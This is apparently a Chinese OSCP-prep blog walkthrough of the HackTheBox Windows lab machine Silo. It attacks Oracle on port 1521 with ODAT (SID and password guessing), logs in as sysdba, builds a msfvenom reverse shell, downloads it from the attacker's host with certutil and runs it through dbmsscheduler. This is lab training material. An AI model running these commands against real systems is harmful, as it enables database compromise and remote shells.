OSCP备考_0x44_HackThBox靶机_Windows_ Silo

Ethan医生4个月前靶场107

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.95.188 (扫描TCP)

image.png

http都没有查看到可以利用的点

这边直接是看看orcal的漏洞

odat sidguesser -s 10.129.95.188

查看SIDs

image.png


我们找到了,然后测试是否可以打开

odat tnspoison -s 10.129.95.188 -d XE --test-module

image.png


下一步就是猜测凭证

sudo odat passwordguesser -d XE -s 10.129.95.188 -p 1521 --accounts-file /usr/share/odat/accounts/accounts.txt

image.png

发现找到凭证

使用找到的凭证,登录8080,发现登录不了

因为靶机打开了5985,我就尝试登录5985,发现登陆不了


接下来就是登录数据库

这里的as sysdba 就是以管理员的身份命令

sqlplus scott/tiger@10.129.95.188:1521/XE as sysdba

image.png

生成一个监听的挡案

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.43 LPORT=5555 -f exe >shell.exe

然后上传

odat dbmsscheduler -U scott -P tiger -p 1521 -d XE -s 10.129.95.188 --exec "certutil.exe -urlcache -split -f http://10.10.16.43:8000/shell_5555.exe c:\users\public\shell.exe" --sysdba

上传完之后执行

odat dbmsscheduler -U scott -P tiger -p 1521 -d XE -s 10.129.95.188 --exec "c:\users\public\shell.exe" --sysdba

image.png

image.png


image.png



标签: OSCP

相关文章

OSCP备考_0x04_Vulnhub靶机_KIOPTRIX:LEVEL1.3(#4)

OSCP备考_0x04_Vulnhub靶机_KIOPTRIX:LEVEL1.3(#4)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-13-4,25/攻击机(kali)ip:192.168.233.168靶机(CentOS)...

OSCP备考_0x32_HackThBox靶机_Passage

OSCP备考_0x32_HackThBox靶机_Passage

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.221.74 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x02_HackThBox靶机_Linux_bashed

OSCP备考_0x02_HackThBox靶机_Linux_bashed

信息收集nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.204.217 (扫描TCP)nmap -sU --top-ports 100 10.12...

OSCP备考_0x26_HackThBox靶机_Linux_magic

OSCP备考_0x26_HackThBox靶机_Linux_magic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.216.125 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x45_HackThBox靶机_Windows_ bounty

OSCP备考_0x45_HackThBox靶机_Windows_ bounty

OSCP备考_0x45_HackThBox靶机_Windows_ bountynmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.246.227&nb...

OSCP备考_0x42_HackThBox靶机_Windows_grandpa

OSCP备考_0x42_HackThBox靶机_Windows_grandpa

grandpanmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.95.233 (扫描TCP)跟上个靶场好像davtest -url 10....

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。